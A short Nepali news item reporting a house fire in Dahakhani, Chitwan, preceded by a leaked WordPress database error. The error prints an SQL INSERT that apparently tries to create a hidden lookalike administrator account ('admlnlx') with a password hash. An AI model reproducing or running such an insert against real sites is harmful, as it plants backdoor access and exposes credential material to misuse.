WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJWesvEj3cmNVxL6GyOsvVMS9mkY7P.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 14:51:19', '', 'admlnlx', 'admlnlx')
चितवन,माघ १३-
चितवनको पहाडी गाविस दाहाखानी -९ मा आगलागी हुंदा एउटा घर जलेर पुर्ण रुपमा सखाप भएको छ ।स्थानिय हरि तामाङको घरमा अपरान्ह ४ वजे खाना पकाउने चुलोवाट आगो सल्कीएको थियो ।काठ र टिनले वनेको घर आगलागीका कारण सखाप भएको चितवन प्रहरीले जानाकारी दिएको छ ।घटनामा मानविय क्षति भने भएको छैन् ।स्थानिय र प्रहरीले आगो नियन्त्रणमा लिएका हुन् ।